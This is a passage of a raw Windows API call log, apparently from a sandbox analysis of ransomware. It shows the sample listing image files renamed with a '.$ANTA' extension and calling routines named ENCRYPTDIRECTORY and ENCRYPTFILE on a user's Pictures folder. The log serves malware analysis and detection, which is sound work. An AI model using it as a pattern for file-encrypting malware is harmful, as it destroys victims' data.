HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.056] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0096.056] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0096.056] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.056] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0096.057] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d7c134, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x3d7c134, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x3e3ad36, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x4ad0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="bflIcpkmQtP.png.$ANTA", cAlternateFileName="BFLICP~1.$AN")) returned 1 [0096.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.057] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0096.057] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fde818, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x3fde818, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x409d326, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x4810, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="EWWH.png.$ANTA", cAlternateFileName="EWWHPN~1.$AN")) returned 1 [0096.057] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4266f46, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x4266f46, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x42ff6fe, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x2450, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="fgq5EW8t8.jpg.$ANTA", cAlternateFileName="FGQ5EW~1.$AN")) returned 1 [0096.057] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4588165, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x4588165, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x46209d2, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x5420, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="J06YyOv018ZbSPW7yM.png.$ANTA", cAlternateFileName="J06YYO~1.$AN")) returned 1 [0096.057] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x479e2ce, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x479e2ce, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x484602e, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xf6e0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="maAjSjcXjKdUlEc2T.bmp.$ANTA", cAlternateFileName="MAAJSJ~1.$AN")) returned 1 [0096.057] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48b7e03, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x48b7e03, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x49506f4, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xc980, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="OjV9.png.$ANTA", cAlternateFileName="OJV9PN~1.$AN")) returned 1 [0096.057] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0f359, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x4a0f359, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x4af428a, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0xf2f0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="W ZDfbD_wanSc.gif.$ANTA", cAlternateFileName="WZDFBD~1.$AN")) returned 1 [0096.057] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c4b697, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x4c4b697, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x4def119, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x18ce0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="X0f8JSrsqtdBsB.png.$ANTA", cAlternateFileName="X0F8JS~1.$AN")) returned 1 [0096.057] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50e5625, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x50e5625, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x51eff32, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x108a0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="Z3f-n12Dk_aAtm.jpg.$ANTA", cAlternateFileName="Z3F-N1~1.$AN")) returned 1 [0096.057] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x532146a, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x532146a, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x5511218, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x12400, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="z6qa.jpg.$ANTA", cAlternateFileName="Z6QAJP~1.$AN")) returned 1 [0096.057] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2630, ftCreationTime.dwHighDateTime=0x144ed98, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2630, ftLastWriteTime.dwLowDateTime=0x43ea508, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="", cAlternateFileName="視мńဓ+\x10")) returned 0 [0096.057] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0096.058] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0096.058] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0096.058] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0096.058] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures")) returned 0x11 [0096.058] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca2b0, cFileName=".", cAlternateFileName="")) returned 0x41ac440 [0096.058] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca2b0, cFileName="..", cAlternateFileName="")) returned 1 [0096.059] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x0, dwReserved1=0x43ca2b0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0096.059] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2460, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x1f, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c356c, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="мńဓ+\x10")) returned 0 [0096.059] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0096.059] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|desktop.ini", cchCount1=12, lpString2="", cchCount2=0) returned 3 [0096.059] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0096.059] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\desktop.ini", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41abfc0 [0096.059] FindClose (in: hFindFile=0x41abfc0 | out: hFindFile=0x41abfc0) returned 1 [0096.059] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0096.059] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0096.059] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0096.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca760, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0096.061] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\saved pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0096.061] FreeLibrary (hLibModule=0x772d0000) returned 1 [0096.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0096.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0096.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0096.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0096.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0096.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0096.062] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0096.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0096.062] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0096.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0096.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0096.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0096.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0096.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0096.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0096.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0096.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0096.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0096.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0096.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0096.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0096.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0096.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0096.064] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0096.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0096.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0096.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0096.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca310, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0096.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.064] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0096.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0096.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0096.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0096.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0096.065] CloseHandle (hObject=0x258) returned 1 [0096.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0096.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0096.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0096.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0096.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0096.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0096.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0096.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0096.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0096.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0096.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0096.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0096.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0096.066] FreeLibrary (hLibModule=0x772d0000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0096.066] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0096.066] RtlAllocateHeap 